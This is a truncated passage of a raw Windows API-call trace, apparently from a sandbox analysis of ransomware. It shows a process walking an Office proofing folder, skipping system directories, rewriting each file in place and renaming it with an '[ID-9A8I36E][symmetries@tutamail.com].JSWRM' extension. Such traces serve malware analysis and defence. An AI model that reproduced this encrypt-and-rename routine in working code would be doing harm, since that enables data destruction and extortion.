returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="..") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="...") returned 1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="windows") returned -1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="recovery") returned -1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="perflogs") returned -1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="documents and settings") returned 1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="system volume information") returned -1 [0139.683] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2="msocache") returned -1 [0139.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0139.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0139.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0139.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.684] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=145920) returned 1 [0139.684] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23a00) returned 0x2501e8 [0139.684] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x23a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x23a00, lpOverlapped=0x0) returned 1 [0139.695] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.695] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x23a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x23a00, lpOverlapped=0x0) returned 1 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.696] CloseHandle (hObject=0x238) returned 1 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0139.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0139.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0139.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7es.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7ES.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7es.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0139.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0139.698] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefe4d066, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefebf763, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26c68, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7FR.DLL", cAlternateFileName="")) returned 1 [0139.698] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2=".") returned 1 [0139.698] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="..") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="...") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="windows") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="recovery") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="perflogs") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="documents and settings") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="system volume information") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.DLL", lpString2="msocache") returned -1 [0139.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0139.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0139.699] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef9622ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9622ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb1dd7cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7FR.LEX", cAlternateFileName="")) returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2=".") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="..") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="...") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="windows") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="recovery") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="perflogs") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="documents and settings") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="system volume information") returned -1 [0139.699] lstrcmpiW (lpString1="MSHY7FR.LEX", lpString2="msocache") returned -1 [0139.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0139.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7FR.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0139.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0139.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.701] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=278528) returned 1 [0139.701] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.701] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.714] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.714] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.715] CloseHandle (hObject=0x238) returned 1 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0139.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0139.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0139.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.715] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7fr.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7FR.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7fr.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0139.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0139.717] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5360180, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5360180, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc5360180, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7EN.dub", cAlternateFileName="")) returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2=".") returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="..") returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="...") returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="windows") returned -1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="recovery") returned -1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="perflogs") returned -1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="documents and settings") returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.717] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="system volume information") returned -1 [0139.718] lstrcmpiW (lpString1="MSSP7EN.dub", lpString2="msocache") returned 1 [0139.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7EN.dub", lpUsedDefaultChar=0x0) returned 11 [0139.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0139.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7EN.dub", lpUsedDefaultChar=0x0) returned 11 [0139.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0139.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0139.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0139.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.719] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=126) returned 1 [0139.719] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0139.719] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0139.720] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.720] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0139.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0139.720] CloseHandle (hObject=0x238) returned 1 [0139.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0139.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0139.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0139.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0139.721] RtlAllocateHeap 